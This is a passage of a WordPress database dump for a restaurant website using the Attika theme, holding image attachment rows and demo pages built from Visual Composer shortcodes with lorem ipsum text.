13:51:29','','h5-img-9','','inherit','open','closed','','h5-img-9','','','2018-08-14 13:51:29','2018-08-14 13:51:29','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h5-img-9.jpg',0,'attachment','image/jpeg',0),(4309,1,'2018-08-10 13:47:15','2018-08-10 13:47:15','','h4-rev-img-1a','','inherit','open','closed','','h4-rev-img-1a','','','2018-08-10 13:47:15','2018-08-10 13:47:15','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h4-rev-img-1a.jpg',0,'attachment','image/jpeg',0),(4310,1,'2018-08-14 13:51:40','2018-08-14 13:51:40','','h5-img-11','','inherit','open','closed','','h5-img-11','','','2018-08-14 13:51:40','2018-08-14 13:51:40','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h5-img-11.jpg',0,'attachment','image/jpeg',0),(4311,1,'2018-08-13 08:19:32','2018-08-13 08:19:32','','h7-port-img-4','','inherit','open','closed','','h7-port-img-4','','','2018-08-13 08:19:32','2018-08-13 08:19:32','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h7-port-img-4.jpg',0,'attachment','image/jpeg',0),(4312,1,'2018-08-13 09:55:56','2018-08-13 09:55:56','','h6-img-7a','','inherit','open','closed','','h6-img-7a','','','2018-08-13 09:55:56','2018-08-13 09:55:56','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h6-img-7a.jpg',0,'attachment','image/jpeg',0),(1488,1,'2018-08-16 11:55:13','2018-08-16 11:55:13','','h5-img-7a','','inherit','open','closed','','h5-img-7a','','','2018-08-16 11:55:13','2018-08-16 11:55:13','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h5-img-7a.png',0,'attachment','image/png',0),(4313,1,'2018-08-10 13:50:41','2018-08-10 13:50:41','','h4-rev-img-1','','inherit','open','closed','','h4-rev-img-1','','','2018-08-10 13:50:41','2018-08-10 13:50:41','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h4-rev-img-1.jpg',0,'attachment','image/jpeg',0),(4314,1,'2018-08-14 13:51:42','2018-08-14 13:51:42','','h5-img-12','','inherit','open','closed','','h5-img-12','','','2018-08-14 13:51:42','2018-08-14 13:51:42','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h5-img-12.jpg',0,'attachment','image/jpeg',0),(4315,1,'2018-08-14 13:51:44','2018-08-14 13:51:44','','h5-img-13','','inherit','open','closed','','h5-img-13','','','2018-08-14 13:51:44','2018-08-14 13:51:44','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h5-img-13.png',0,'attachment','image/png',0),(4316,1,'2018-08-13 09:55:59','2018-08-13 09:55:59','','h6-img-8a','','inherit','open','closed','','h6-img-8a','','','2018-08-13 09:55:59','2018-08-13 09:55:59','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h6-img-8a.jpg',0,'attachment','image/jpeg',0),(1507,1,'2018-08-16 13:57:15','2018-08-16 13:57:15','','h5-img-10a','','inherit','open','closed','','h5-img-10a','','','2018-08-16 13:57:15','2018-08-16 13:57:15','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h5-img-10a.png',0,'attachment','image/png',0),(4317,1,'2018-08-13 08:19:35','2018-08-13 08:19:35','','h7-port-img-5','','inherit','open','closed','','h7-port-img-5','','','2018-08-13 08:19:35','2018-08-13 08:19:35','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h7-port-img-5.jpg',0,'attachment','image/jpeg',0),(1700,1,'2018-08-20 11:29:10','2018-08-20 11:29:10','','blog-post-img-8','','inherit','open','closed','','blog-post-img-8','','','2018-08-20 11:29:10','2018-08-20 11:29:10','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/blog-post-img-8.jpg',0,'attachment','image/jpeg',0),(1722,1,'2018-08-20 13:49:52','2018-08-20 13:49:52','[vc_row css=\".vc_custom_1534774802696{padding-top: 120px !important;padding-bottom: 120px !important;}\"][vc_column width=\"1/5\" css=\".vc_custom_1534165726623{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_hidden-md vc_hidden-sm vc_hidden-xs\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\" css=\".vc_custom_1534773952847{padding-right: 0px !important;padding-left: 0px !important;}\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#f8f2ed\" title=\"Generic\" content_padding=\"32%\" email=\"info@attica.ny\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1534165780856{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Press\" content_padding=\"32%\" email=\"info@attica.ny\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1534165820540{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Inquiry\" content_padding=\"32%\" email=\"info@attica.ny\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1534165836132{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Events\" content_padding=\"32%\" email=\"info@attica.ny\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\" css=\".vc_custom_1534846539016{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-3 vc_col-md-6 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#e7dfdf\" content_padding=\"124px 0\" title=\"Generic inquiries\" email=\"info@attica.ny\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1534846548790{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-3 vc_col-md-6 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" content_padding=\"124px 0\" title=\"Press\" email=\"press@attica.ny\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1534846476531{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-3 vc_col-md-6 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#ebebeb\" content_padding=\"124px 0\" title=\"Job inquiry\" email=\"work@attica.ny\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1534846495355{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-3 vc_col-md-6 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#ebebeb\" content_padding=\"124px 0\" title=\"Job inquiry\" email=\"work@attica.ny\"][/vc_column][/vc_row]','Info Box','','publish','closed','closed','','info-box','','','2018-08-20 13:49:52','2018-08-20 13:49:52','',3039,'http://attika.mikado-themes.com/?page_id=1722',0,'page','',0),(1734,1,'2018-08-20 14:52:06','2018-08-20 14:52:06','[vc_row row_content_width=\"grid\" css=\".vc_custom_1534845914289{padding-top: 120px !important;padding-bottom: 45px !important;}\"][vc_column width=\"1/2\" offset=\"vc_col-lg-3 vc_col-md-6\"][mkdf_pie_chart title_tag=\"h5\" percent=\"29\" title=\"Recepies\" text=\"Donec quam felis, ultricies nec pellentesque eu pretium quis\" percent_color=\"#111111\" active_color=\"#111111\" inactive_color=\"#faf5f0\"][vc_empty_space height=\"62px\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-3 vc_col-md-6\"][mkdf_pie_chart title_tag=\"h5\" percent=\"63\" title=\"Chefs\" text=\"Donec quam felis, ultricies nec pellentesque eu pretium quis\" percent_color=\"#111111\" active_color=\"#111111\" inactive_color=\"#faf5f0\"][vc_empty_space height=\"62px\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-3 vc_col-md-6\"][mkdf_pie_chart title_tag=\"h5\" percent=\"88\" title=\"Restaurants\" text=\"Donec quam felis, ultricies nec pellentesque eu pretium quis\" percent_color=\"#111111\" active_color=\"#111111\" inactive_color=\"#faf5f0\"][vc_empty_space height=\"62px\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-3 vc_col-md-6\"][mkdf_pie_chart title_tag=\"h5\" percent=\"54\" title=\"Attika\" text=\"Donec quam felis, ultricies nec pellentesque eu pretium quis\" percent_color=\"#111111\" active_color=\"#111111\" inactive_color=\"#faf5f0\"][vc_empty_space height=\"62px\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1534845920739{padding-top: 120px !important;padding-bottom: 45px !important;}\" simple_background_color=\"#faf5f0\"][vc_column width=\"1/2\" offset=\"vc_col-lg-3 vc_col-md-6\"][mkdf_pie_chart title_tag=\"h5\" percent=\"88\" title=\"Restaurants\" active_color=\"#111111\" inactive_color=\"#ffffff\"][vc_empty_space height=\"65px\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-3 vc_col-md-6\"][mkdf_pie_chart title_tag=\"h5\" percent=\"54\" title=\"Attika\" active_color=\"#111111\" inactive_color=\"#ffffff\"][vc_empty_space height=\"65px\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-3 vc_col-md-6\"][mkdf_pie_chart title_tag=\"h5\" percent=\"29\" title=\"Recepies\" active_color=\"#111111\" inactive_color=\"#ffffff\"][vc_empty_space height=\"65px\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-3 vc_col-md-6\"][mkdf_pie_chart title_tag=\"h5\" percent=\"63\" title=\"Chefs\" active_color=\"#111111\" inactive_color=\"#ffffff\"][vc_empty_space height=\"65px\"][/vc_column][/vc_row]','Pie Chart','','publish','closed','closed','','pie-chart','','','2018-08-20 14:52:06','2018-08-20 14:52:06','',3039,'http://attika.mikado-themes.com/?page_id=1734',0,'page','',0),(1742,1,'2018-08-20 15:04:26','2018-08-20 15:04:26','[vc_row row_content_width=\"grid\"][vc_column][mkdf_portfolio_list type=\"trio\" space_between_items=\"normal\" enable_image_shadow=\"no\" orderby=\"date\" order=\"ASC\" item_style=\"trio-info-bottom-hover\" title_tag=\"h6\" category=\"food\"][/vc_column][/vc_row]','Portfolio Trio','','publish','closed','closed','','portfolio-trio','','','2018-08-20 15:04:26','2018-08-20 15:04:26','',3039,'http://attika.mikado-themes.com/?page_id=1742',0,'page','',0),(1594,1,'2018-08-17 13:22:16','2018-08-17 13:22:16','','h2-rev-img-4','','inherit','open','closed','','h2-rev-img-4','','','2018-08-17 13:22:16','2018-08-17 13:22:16','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h2-rev-img-4.jpg',0,'attachment','image/jpeg',0),(4318,1,'2018-08-14 13:51:47','2018-08-14 13:51:47','','h5-img-14','','inherit','open','closed','','h5-img-14','','','2018-08-14 13:51:47','2018-08-14 13:51:47','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h5-img-14.jpg',0,'attachment','image/jpeg',0),(4319,1,'2018-08-10 14:01:02','2018-08-10 14:01:02','','h3-img-gallery-1','','inherit','open','closed','','h3-img-gallery-1','','','2018-08-10 14:01:02','2018-08-10 14:01:02','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h3-img-gallery-1.jpg',0,'attachment','image/jpeg',0),(1300,1,'2018-08-14 14:57:01','2018-08-14 14:57:01','','h5-rev-img-4','','inherit','open','closed','','h5-rev-img-4','','','2018-08-14 14:57:01','2018-08-14 14:57:01','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h5-rev-img-4.jpg',0,'attachment','image/jpeg',0),(4320,1,'2018-08-13 09:56:02','2018-08-13 09:56:02','','h6-img-9a','','inherit','open','closed','','h6-img-9a','','','2018-08-13 09:56:02','2018-08-13 09:56:02','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h6-img-9a.jpg',0,'attachment','image/jpeg',0),(1302,1,'2018-08-14 14:59:06','2018-08-14 14:59:06','','h5-rev-img-3a','','inherit','open','closed','','h5-rev-img-3a','','','2018-08-14 14:59:06','2018-08-14 14:59:06','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h5-rev-img-3a.png',0,'attachment','image/png',0),(1701,1,'2018-08-20 11:29:12','2018-08-20 11:29:12','','blog-post-img-9','','inherit','open','closed','','blog-post-img-9','','','2018-08-20 11:29:12','2018-08-20 11:29:12','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/blog-post-img-9.jpg',0,'attachment','image/jpeg',0),(1509,1,'2018-08-16 15:09:46','2018-08-16 15:09:46','','h3-page-backround-pattern','','inherit','open','closed','','h3-page-backround-pattern','','','2018-08-16 15:09:46','2018-08-16 15:09:46','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h3-page-backround-pattern.jpg',0,'attachment','image/jpeg',0),(4321,1,'2018-08-10 14:01:05','2018-08-10 14:01:05','','h3-img-gallery-2','','inherit','open','closed','','h3-img-gallery-2','','','2018-08-10 14:01:05','2018-08-10 14:01:05','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h3-img-gallery-2.jpg',0,'attachment','image/jpeg',0),(4322,1,'2018-08-13 08:19:39','2018-08-13 08:19:39','','h7-port-img-6','','inherit','open','closed','','h7-port-img-6','','','2018-08-13 08:19:39','2018-08-13 08:19:39','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h7-port-img-6.jpg',0,'attachment','image/jpeg',0),(4323,1,'2018-08-13 10:33:58','2018-08-13 10:33:58','','h3-team-member','','inherit','open','closed','','h3-team-member','','','2018-08-13 10:33:58','2018-08-13 10:33:58','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h3-team-member.jpg',0,'attachment','image/jpeg',0),(1804,1,'2018-08-21 11:13:55','2018-08-21 11:13:55','[vc_row row_content_width=\"grid\" css=\".vc_custom_1534853329041{padding-bottom: 125px !important;}\"][vc_column][mkdf_product_list info_position=\"info-below-image\" number_of_columns=\"three\" space_between_items=\"huge\" orderby=\"date\" order=\"ASC\" taxonomy_to_display=\"category\" image_size=\"\" number_of_posts=\"3\" info_bottom_margin=\"-20px\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1534853344872{padding-bottom: 125px !important;}\"][vc_column][mkdf_product_list info_position=\"info-below-image\" number_of_columns=\"four\" space_between_items=\"huge\" orderby=\"date\" order=\"DESC\" taxonomy_to_display=\"category\" image_size=\"\" number_of_posts=\"4\" info_bottom_margin=\"-20px\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1534850453758{padding-right: 80px !important;padding-bottom: 60px !important;padding-left: 80px !important;}\"][vc_column][mkdf_product_list info_position=\"info-below-image\" number_of_columns=\"five\" space_between_items=\"huge\" orderby=\"date\" order=\"ASC\" taxonomy_to_display=\"category\" image_size=\"\" number_of_posts=\"5\" info_bottom_margin=\"-20px\"][/vc_column][/vc_row]','Product List','','publish','closed','closed','','product-list','','','2018-08-21 11:13:55','2018-08-21 11:13:55','',3039,'http://attika.mikado-themes.com/?page_id=1804',0,'page','',0),(1805,1,'2018-08-21 11:13:25','2018-08-21 11:13:25','[vc_row][vc_column][mkdf_portfolio_slider enable-center=\"no\" enable-auto-width=\"yes\" space_between_items=\"normal\" image_proportions=\"full\" orderby=\"date\" order=\"ASC\" portfolio_slider_full_height_decrease=\"yes\" item_style=\"gallery-info-bottom\" title_tag=\"h5\" enable_loop=\"yes\" enable_autoplay=\"yes\" enable_navigation=\"no\" enable_pagination=\"no\" category=\"dessert\"][/vc_column][/vc_row]','Portfolio Carousel','','publish','closed','closed','','portfolio-carousel','','','2018-08-21 11:13:25','2018-08-21 11:13:25','',3061,'http://attika.mikado-themes.com/?page_id=1805',0,'page','',0),(1811,1,'2018-08-21 11:18:17','2018-08-21 11:18:17','[vc_row full_height=\"yes\" equal_height=\"yes\"][vc_column][mkdf_portfolio_slider enable-center=\"no\" enable-auto-width=\"yes\" space_between_items=\"no\" image_proportions=\"full\" orderby=\"date\" order=\"ASC\" portfolio_slider_full_height_decrease=\"no\" item_style=\"gallery-overlay\" title_tag=\"h5\" enable_category=\"no\" enable_loop=\"yes\" enable_autoplay=\"yes\" enable_navigation=\"yes\" enable_navigation_numbers=\"yes\" navigation_number_position=\"inner\" navigation_skin=\"dark\" enable_pagination=\"no\" category=\"homemade\"][/vc_column][/vc_row]','Fullscreen Slider','','publish','closed','closed','','fullscreen-slider','','','2018-08-21 11:18:17','2018-08-21 11:18:17','',3061,'http://attika.mikado-themes.com/?page_id=1811',0,'page','',0),(1819,1,'2018-08-21 11:22:51','2018-08-21 11:22:51','[vc_row content_text_aligment=\"center\"][vc_column][mkdf_portfolio_slider enable-center=\"no\" enable-auto-width=\"no\" number_of_columns=\"one\" space_between_items=\"no\" image_proportions=\"full\" orderby=\"date\" order=\"ASC\" portfolio_slider_full_height_decrease=\"yes\" item_style=\"slider-overlay\" enable_loop=\"yes\" enable_autoplay=\"yes\" enable_navigation=\"yes\" enable_navigation_numbers=\"yes\" navigation_number_position=\"outer\" enable_pagination=\"yes\" pagination_skin=\"dark\" pagination_position=\"below-slider\" enable_title_pag=\"yes\" category=\"kitchen\" number_of_items=\"5\"][/vc_column][/vc_row]','Portfolio Slider','','publish','closed','closed','','portfolio-slider','','','2018-08-21 11:22:51','2018-08-21 11:22:51','',3061,'http://attika.mikado-themes.com/?page_id=1819',0,'page','',0),(1827,1,'2018-08-21 12:28:14','2018-08-21 12:28:14','[vc_row row_content_width=\"grid\" content_width=\"grid\" animate_rounded_tab=\"yes\"][vc_column offset=\"vc_col-lg-6 vc_col-md-6\"][vc_column_text][mkdf_dropcaps type=\"square\" color=\"#ffffff\" background_color=\"#a1a1a1\"]A[/mkdf_dropcaps]rem ipsum dolor. Sit amet non. Libero varius ligula a id nec libero amet non metus ligula risus egestas senectus euismod. In vel tristique. Nulla risus aliquam venenatis ut feugiat. Suspendisse nec ultricies. Pulvinar fusce varius consequat quis ornare. Tellus ridiculus quisque. Ullamcorper pulvinar pede. Sem porta sit nibh vivamus.[/vc_column_text][vc_empty_space height=\"30px\"][/vc_column][vc_column offset=\"vc_col-lg-6 vc_col-md-6\"][vc_column_text][mkdf_dropcaps type=\"square\" color=\"#ffffff\" background_color=\"#111\"]A[/mkdf_dropcaps]rem ipsum dolor. Sit amet non. Libero varius ligula a id nec libero amet non metus ligula risus egestas senectus euismod. In vel tristique. Nulla risus aliquam venenatis ut feugiat. Suspendisse nec ultricies. Pulvinar fusce varius consequat quis ornare. Tellus ridiculus quisque. Ullamcorper pulvinar pede. Sem porta sit nibh vivamus.[/vc_column_text][vc_empty_space height=\"30px\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_width=\"grid\" animate_rounded_tab=\"yes\" css=\".vc_custom_1534855033686{padding-top: 40px !important;}\"][vc_column offset=\"vc_col-lg-6 vc_col-md-6\"][vc_column_text][mkdf_dropcaps type=\"circle\" color=\"#ffffff\" background_color=\"#a1a1a1\"]A[/mkdf_dropcaps]rem ipsum dolor. Sit amet non. Libero varius ligula a id nec libero amet non metus ligula risus egestas senectus euismod. In vel tristique. Nulla risus aliquam venenatis ut feugiat. Suspendisse nec ultricies. Pulvinar fusce varius consequat quis ornare. Tellus ridiculus quisque. Ullamcorper pulvinar pede. Sem porta sit nibh vivamus.[/vc_column_text][vc_empty_space height=\"30px\"][/vc_column][vc_column offset=\"vc_col-lg-6 vc_col-md-6\"][vc_column_text][mkdf_dropcaps type=\"circle\" color=\"#ffffff\" background_color=\"#111\"]A[/mkdf_dropcaps]rem ipsum dolor. Sit amet non. Libero varius ligula a id nec libero amet non metus ligula risus egestas senectus euismod. In vel tristique. Nulla risus aliquam venenatis ut feugiat. Suspendisse nec ultricies. Pulvinar fusce varius consequat quis ornare. Tellus ridiculus quisque. Ullamcorper pulvinar pede. Sem porta sit nibh vivamus.[/vc_column_text][vc_empty_space height=\"30px\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_width=\"grid\" animate_rounded_tab=\"yes\" css=\".vc_custom_1534855045184{padding-top: 40px !important;}\"][vc_column offset=\"vc_col-lg-6 vc_col-md-6\"][vc_column_text][mkdf_dropcaps type=\"normal\" color=\"#a1a1a1\" background_color=\"\"]A[/mkdf_dropcaps]rem ipsum dolor. Sit amet non. Libero varius ligula a id nec libero amet non metus ligula risus egestas senectus euismod. In vel tristique. Nulla risus aliquam venenatis ut feugiat. Suspendisse nec ultricies. Pulvinar fusce varius consequat quis ornare. Tellus ridiculus quisque. Ullamcorper pulvinar pede. Sem porta sit nibh vivamus.[/vc_column_text][vc_empty_space height=\"30px\"][/vc_column][vc_column offset=\"vc_col-lg-6 vc_col-md-6\"][vc_column_text][mkdf_dropcaps type=\"normal\" color=\"#111\" background_color=\"\"]A[/mkdf_dropcaps]rem ipsum dolor. Sit amet non. Libero varius ligula a id nec libero amet non metus ligula risus egestas senectus euismod. In vel tristique. Nulla risus aliquam venenatis ut feugiat. Suspendisse nec ultricies. Pulvinar fusce varius consequat quis ornare. Tellus ridiculus quisque. Ullamcorper pulvinar pede. Sem porta sit nibh vivamus.[/vc_column_text][vc_empty_space height=\"30px\"][/vc_column][/vc_row]','Dropcaps','','publish','closed','closed','','dropcaps','','','2018-08-21 12:28:14','2018-08-21 12:28:14','',3039,'http://attika.mikado-themes.com/?page_id=1827',0,'page','',0),(1625,1,'2018-08-17 14:17:19','2018-08-17 14:17:19','','h3-bottom-backround-img','','inherit','open','closed','','h3-bottom-backround-img','','','2018-08-17 14:17:19','2018-08-17 14:17:19','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h3-bottom-backround-img.jpg',0,'attachment','image/jpeg',0),(1525,1,'2018-08-16 15:36:52','2018-08-16 15:36:52','','h3-team-spec-member','','inherit','open','closed','','h3-team-spec-member','','','2018-08-16 15:36:52','2018-08-16 15:36:52','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h3-team-spec-member.jpg',0,'attachment','image/jpeg',0),(1836,1,'2018-08-21 12:50:08','2018-08-21 12:50:08','[vc_row row_content_width=\"grid\" css=\".vc_custom_1534856850202{padding-bottom: 50px !important;}\"][vc_column offset=\"vc_col-lg-offset-0 vc_col-lg-6 vc_col-md-offset-0 vc_col-md-12 vc_col-sm-offset-0\"][mkdf_progress_bar title_tag=\"\" percent=\"82\" title=\"Restaurants\" color_active=\"#a1a1a1\"][vc_empty_space height=\"20px\"][mkdf_progress_bar title_tag=\"\" percent=\"63\" title=\"Events\" color_active=\"#a1a1a1\"][vc_empty_space height=\"20px\"][mkdf_progress_bar title_tag=\"\" percent=\"47\" title=\"Clients\" color_active=\"#a1a1a1\"][vc_empty_space height=\"20px\"][mkdf_progress_bar title_tag=\"\" percent=\"79\" title=\"Reservation\" color_active=\"#a1a1a1\"][vc_empty_space height=\"36px\"][/vc_column][vc_column offset=\"vc_col-lg-offset-0 vc_col-lg-6 vc_col-md-offset-0 vc_col-md-12 vc_col-sm-offset-0\"][mkdf_progress_bar title_tag=\"\" percent=\"74\" title=\"Events\" color_active=\"#a1a1a1\"][vc_empty_space height=\"20px\"][mkdf_progress_bar title_tag=\"\" percent=\"92\" title=\"Reservation\" color_active=\"#a1a1a1\"][vc_empty_space height=\"20px\"][mkdf_progress_bar title_tag=\"\" percent=\"43\" title=\"Restaurants\" color_active=\"#a1a1a1\"][vc_empty_space height=\"20px\"][mkdf_progress_bar title_tag=\"\" percent=\"51\" title=\"Clients\" color_active=\"#a1a1a1\"][vc_empty_space height=\"36px\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column][mkdf_progress_bar title_tag=\"\" percent=\"64\" title=\"Reservation\" color_active=\"#111111\"][vc_empty_space height=\"20px\"][mkdf_progress_bar title_tag=\"\" percent=\"73\" title=\"Clients\" color_active=\"#111111\"][vc_empty_space height=\"20px\"][mkdf_progress_bar title_tag=\"\" percent=\"88\" title=\"Events\" color_active=\"#111111\"][vc_empty_space height=\"20px\"][mkdf_progress_bar title_tag=\"\" percent=\"47\" title=\"Restaurants\" color_active=\"#111111\"][/vc_column][/vc_row]','Progress Bar','','publish','closed','closed','','progress-bar','','','2018-08-21 12:50:08','2018-08-21 12:50:08','',3039,'http://attika.mikado-themes.com/?page_id=1836',0,'page','',0),(1852,1,'2018-08-21 13:16:48','2018-08-21 13:16:48','[vc_row content_placement=\"middle\" row_content_width=\"grid\" content_text_aligment=\"center\" css=\".vc_custom_1535122900444{padding-top: 120px !important;padding-bottom: 110px !important;}\"][vc_column][mkdf_countdown skin=\"\" year=\"2019\" month=\"6\" day=\"1\" hour=\"0\" minute=\"0\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" row_content_width=\"grid\" content_text_aligment=\"center\" css=\".vc_custom_1535122907740{padding-top: 120px !important;padding-bottom: 110px !important;}\" simple_background_color=\"#fef8f7\"][vc_column][mkdf_countdown skin=\"\" year=\"2019\" month=\"6\" day=\"1\" hour=\"0\" minute=\"0\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" row_content_width=\"grid\" content_text_aligment=\"center\" simple_background_color=\"#111111\" css=\".vc_custom_1534857575519{padding-top: 120px !important;padding-bottom: 130px !important;}\"][vc_column][mkdf_countdown skin=\"mkdf-light-skin\" year=\"2019\" month=\"11\" day=\"14\" hour=\"15\" minute=\"9\"][/vc_column][/vc_row]','Countdown','','publish','closed','closed','','countdown','','','2018-08-21 13:16:48','2018-08-21 13:16:48','',3039,'http://attika.mikado-themes.com/?page_id=1852',0,'page','',0),(1857,1,'2018-08-21 13:36:35','2018-08-21 13:36:35','[vc_row row_content_width=\"grid\" content_text_aligment=\"center\" css=\".vc_custom_1534860044567{padding-top: 95px !important;padding-bottom: 33px !important;}\"][vc_column width=\"1/2\" offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-3 vc_col-sm-offset-0 vc_col-xs-12\"][mkdf_counter type=\"mkdf-zero-counter\" title_tag=\"\" title_font_weight=\"\" digit=\"86\" title=\"Restaurant\" title_color=\"#999999\"][vc_empty_space height=\"62px\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-3 vc_col-sm-offset-0 vc_col-xs-12\"][mkdf_counter type=\"mkdf-zero-counter\" title_tag=\"\" title_font_weight=\"\" digit=\"25\" title=\"Clients\" title_color=\"#999999\"][vc_empty_space height=\"62px\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-3 vc_col-sm-offset-0 vc_col-xs-12\"][mkdf_counter type=\"mkdf-zero-counter\" title_tag=\"\" title_font_weight=\"\" digit=\"17\" title=\"Attika\" title_color=\"#999999\"][vc_empty_space height=\"62px\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-3 vc_col-sm-offset-0 vc_col-xs-12\"][mkdf_counter type=\"mkdf-zero-counter\" title_tag=\"\" title_font_weight=\"\" digit=\"68\" title=\"Events\" title_color=\"#999999\"][vc_empty_space height=\"62px\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_text_aligment=\"center\" css=\".vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}\" simple_background_color=\"#faf5f0\"][vc_column width=\"1/2\" offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-3 vc_col-sm-offset-0 vc_col-xs-12\"][mkdf_counter type=\"mkdf-zero-counter\" title_tag=\"\" title_font_weight=\"\" digit=\"68\" title=\"Clients\"][vc_empty_space height=\"62px\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-3 vc_col-sm-offset-0 vc_col-xs-12\"][mkdf_counter type=\"mkdf-zero-counter\" title_tag=\"\" title_font_weight=\"\" digit=\"17\" title=\"Events\"][vc_empty_space height=\"62px\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-3 vc_col-sm-offset-0 vc_col-xs-12\"][mkdf_counter type=\"mkdf-zero-counter\" title_tag=\"\" title_font_weight=\"\" digit=\"86\" title=\"Attika\"][vc_empty_space height=\"62px\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-3 vc_col-sm-offset-0 vc_col-xs-12\"][mkdf_counter type=\"mkdf-zero-counter\" title_tag=\"\" title_font_weight=\"\" digit=\"25\" title=\"Restaurant\"][vc_empty_space height=\"62px\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_text_aligment=\"center\" css=\".vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px !important;}\" simple_background_color=\"#111111\"][vc_column width=\"1/2\" offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-3 vc_col-sm-offset-0 vc_col-xs-12\"][mkdf_counter type=\"mkdf-zero-counter\" title_tag=\"\" title_font_weight=\"\" digit=\"17\" title=\"Events\" digit_color=\"#ffffff\" title_color=\"#ffffff\"][vc_empty_space height=\"62px\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-3 vc_col-sm-offset-0 vc_col-xs-12\"][mkdf_counter type=\"mkdf-zero-counter\" title_tag=\"\" title_font_weight=\"\" digit=\"86\" title=\"Attika\" digit_color=\"#ffffff\" title_color=\"#ffffff\"][vc_empty_space height=\"62px\"][/vc_column][vc_column width=\"1/2\" 